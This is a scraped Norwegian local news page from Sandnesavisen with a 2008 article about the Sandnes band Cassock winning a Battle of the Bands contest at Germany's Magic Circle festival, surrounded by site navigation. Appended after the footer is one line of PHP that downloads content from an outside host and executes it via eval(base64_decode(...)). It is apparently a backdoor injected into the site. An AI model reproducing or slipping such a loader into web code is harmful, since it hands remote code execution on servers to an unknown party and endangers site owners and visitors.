GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
26. juni 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Cassock til topps i Tyskland
onsdag 22. oktober 2008

Det ryktes at det har skjedd endel i etterkant av plateslippet, så vi tok oss en prat med bassist Øyvind Lende for å få en oppdatering. Lende kan rapportere om at det har skjedd en hel del uforutsette hendelser etter plateslippet i mai.

Cassock til topps i Tyskland

Plateslippet ble markert med konsert på Tribute i Sandnes, og med 110 betalende, i tillegg til gjester osv. var dette for en kongekveld å regne, som bandet selv sier.

Vanskelig å få anmeldelse

Når det gjelder anmeldelser av “Liberty of Speech” er det verre. Det viser seg vanskelig for relativt ukjente band å få noen ord i de store avisene, men bandet tar ikke det så tungt. De har fått mye skryt av de som har kjøpt og hørt platen, og det er jo det som er viktig. At de store salgstallene uteblir er heller ingen overraskelse, i og med at de står for alt salg og promotering selv. “Litt av tanken var å lage en best mulig demo for de begrensede midlene vi hadde, og bruke denne til promotering” sier Lende. Endel av opplaget på tusen plater er derfor sendt ut til diverse aktører i bransjen, sammen med annet promomateriell.

Tyskland

Men det har skjedd mer i Cassock-leiren... En tidlig vårdag pakket de en plate og sendte den avgårde til en “Battle of the Bands” konkurranse i forbindelse med festivalen “Magic Circle” i Tyskland. Magic Circle er en stor festival, med ca. 35.000 besøkende, som arrangeres av det legendariske bandet Manowar’s plateselskap med samme navn. Totalt 250 band sendte inn musikk til denne konkurransen, og Cassock hadde nesten glemt at de meldte seg på da de plutselig fikk en e-post om at de var plukket ut sammen med 15 andre band, og ble bedt om komme ned og spille semi-finale på festivalen. Cassock tenkte at de sikkert kom til å spille i et lite øltelt eller noe lignende, men var ikke villige til å la en sjanse som denne gå fra dem, så de pakket bussen, og tok turen nedover en fin julidag. Da de ankom festivalen viste det seg at det de trodde skulle være et øltelt ikke var noe telt i det hele tatt, men en stor hall på størrelse med en stor idrettshall, med lyd og lysanlegg en festival verdig. Semifinalene gikk over to dager, og Cassock gjorde det de kan best - lage et heftig rockeshow - noe som førte til at de ganske elegant snek seg videre til finalen neste dag. Der gjorde de enda en bra figur, og etter en jevn avstemning stakk de av med seieren over 250 andre band fra hele verden!

Premie på hovedscenen

Premien var å få spille på hovedscenen dagen etter, være med på en live DVD fra festivalen, samt en singelkontrakt med Magic Circle Music - selveste Manowar sitt plateselskap! Cassock ble vartet opp av arrangørene, med egen garderobe og egen hjelper som sørget for at de fikk alt de trengte for å gjøre en god jobb. Manowar ville selvsagt også hilse på vinnerne av konkurransen, og i full scenemundur ankom de backstagen omringet av sikkerhetsvakter. De håndhilste, og ønsket Cassock velkommen til labelen sin - et stort rockeøyeblikk for en gjeng slitne rockere fra Sandnes. Turen var naturlig nok årets høydepunkt for Cassock, og de mottar ennå e-post fra tyske fans, gjerne med bilder der de står sammen med dem. Detaljene rundt singelutgivelsen er ikke helt klar ennå, men dvd-utgivelsen nærmer seg med stormskritt, og man kan allerede forhåndsbestille den på Amazon.com

Radiospilling

Men Cassock setter seg ikke ned og venter på at ting skal gå av seg selv. De fortsetter som før, og tilbringer like mye, om ikke mer, tid på øvingslokalet og jobber med nye låter. Ryktet som et bra og underholdende live-band må opprettholdes, og de har ikke tålmodighet til å vente og se hva framtiden bringer. Systematisk promotion har resultert i radiospilling i Tyskland, Frankrike og USA. I Norge er det verre å komme på spillelister, selv med redaksjonelle anbefalinger fra NRK Urørt.

 

 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));